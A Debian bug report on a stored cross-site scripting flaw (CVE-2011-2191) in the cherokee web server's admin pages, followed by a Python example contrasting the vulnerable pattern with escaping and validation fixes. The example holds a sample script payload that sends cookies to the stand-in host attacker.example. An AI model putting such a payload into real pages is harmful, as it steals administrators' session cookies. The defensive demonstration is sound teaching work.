Helmut Grohne
2012-Mar-03 10:46 UTC
[Secure-testing-team] Bug#661993: CVE-2011-2191: persistent CSRF on admin interface
Source: cherokee
Version: 1.2.101-1
Severity: serious
Tags: security
References: CVE-2011-2191
https://bugs.launchpad.net/ubuntu/+source/cherokee/+bug/784632
https://bugzilla.redhat.com/show_bug.cgi?id=713304

Please verify whether the issue is still present in the package. A quick look at admin/PageVServers.py suggests that this is the case, because the Commit function stores new_nick without any validation. Even though the value is escaped on some accesses, admin/PageStatus.py Render_Content does not perform escaping.

Helmut
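The pattern the report describes, a submitted nickname stored without validation and later rendered by a page that does not escape it, reduced to a self-contained illustration. This is an added example written for this page, not cherokee's code: the store, the commit and render functions, the nick regex and the sample payload are all hypothetical, and the constructed input stands in for a value an attacker could set through the admin interface (for instance via the CSRF the CVE is about). The escaped render and the allow-list on commit show the two independent fixes; either one alone is not enough, since the value is still attacker-controlled data once stored.

```python
import html
import re

# Constructed sample input: a virtual-server nick submitted through the
# admin form by an attacker-controlled request. Hypothetical, for this
# example only.
MALICIOUS_NICK = ('prod<script>new Image().src="http://attacker.example/'
                  '?c="+document.cookie</script>')

# Assumed allow-list for a nick: hostname-like characters, bounded length.
NICK_RE = re.compile(r'^[A-Za-z0-9._-]{1,64}$')


class VServerStore:
    """Minimal stand-in for the admin configuration that keeps nicks."""

    def __init__(self):
        self.nicks = {}


def commit_unvalidated(store, vserver_id, new_nick):
    """Vulnerable pattern: persist whatever was submitted, unchecked."""
    store.nicks[vserver_id] = new_nick


def commit_validated(store, vserver_id, new_nick):
    """Hardened commit: reject anything outside the allow-list."""
    if not NICK_RE.match(new_nick):
        raise ValueError("invalid virtual server nick: %r" % new_nick)
    store.nicks[vserver_id] = new_nick


def render_status_unescaped(store):
    """Vulnerable render: stored nick is interpolated into HTML verbatim,
    so a stored payload executes in every admin's browser on this page."""
    rows = ("<tr><td>%s</td><td>%s</td></tr>" % (vid, nick)
            for vid, nick in store.nicks.items())
    return "<table>%s</table>" % "".join(rows)


def render_status_escaped(store):
    """Hardened render: escape on output regardless of what was stored."""
    rows = ("<tr><td>%s</td><td>%s</td></tr>"
            % (html.escape(str(vid)), html.escape(nick))
            for vid, nick in store.nicks.items())
    return "<table>%s</table>" % "".join(rows)


def script_tag_present(markup):
    """Crude check used by the demo: does raw <script> survive into output?"""
    return "<script>" in markup.lower()


def demo():
    """Returns (vulnerable_has_script, hardened_has_script, commit_rejected)."""
    store = VServerStore()
    commit_unvalidated(store, 1, MALICIOUS_NICK)
    vulnerable = script_tag_present(render_status_unescaped(store))
    hardened = script_tag_present(render_status_escaped(store))
    rejected = False
    try:
        commit_validated(VServerStore(), 1, MALICIOUS_NICK)
    except ValueError:
        rejected = True
    return vulnerable, hardened, rejected


if __name__ == "__main__":
    print(demo())
```

Output escaping is the fix that covers every page; the allow-list on commit is defence in depth, and it also keeps a nick from breaking any other place the value is reused (log lines, generated configuration) where HTML escaping is the wrong encoding.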